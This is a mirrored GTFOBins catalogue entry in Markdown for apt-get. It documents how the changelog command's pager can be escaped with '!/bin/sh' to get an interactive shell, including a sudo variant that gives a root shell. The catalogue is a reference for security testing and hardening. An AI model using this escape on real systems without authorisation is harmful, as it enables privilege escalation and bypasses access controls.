mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 23:09:46 +01:00
13 lines
306 B
Markdown
13 lines
306 B
Markdown
|
---
|
||
|
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||
|
functions:
|
||
|
execute-interactive:
|
||
|
- code: |
|
||
|
apt-get changelog apt
|
||
|
!/bin/sh
|
||
|
sudo-enabled:
|
||
|
- code: |
|
||
|
sudo apt-get changelog apt
|
||
|
!/bin/sh
|
||
|
---
|